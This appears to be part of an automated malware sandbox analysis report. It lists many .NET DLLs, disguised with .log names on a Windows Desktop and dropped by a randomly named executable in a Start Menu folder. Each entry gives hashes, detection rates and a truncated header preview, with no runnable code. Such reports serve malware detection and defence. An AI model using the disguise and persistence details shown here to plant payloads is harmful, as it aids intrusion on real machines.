                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\IgGVBfqZ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\IzyaiCCJ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\JQrKHwDu.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 6%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\JRYtVobT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\JapvNPbx.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\JnnBaKLz.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\JvdSwEFX.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\KDDLYXsV.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 6%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\KFIMcleA.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\KGTKXJkx.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\KMbLIKLR.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\KszcatAz.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\LBCkjtUW.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\LESjjfMz.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\LEvStJys.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\LGJlUtwq.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\LNSSdwSp.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\LOtDzcWv.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\LfVByPYY.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
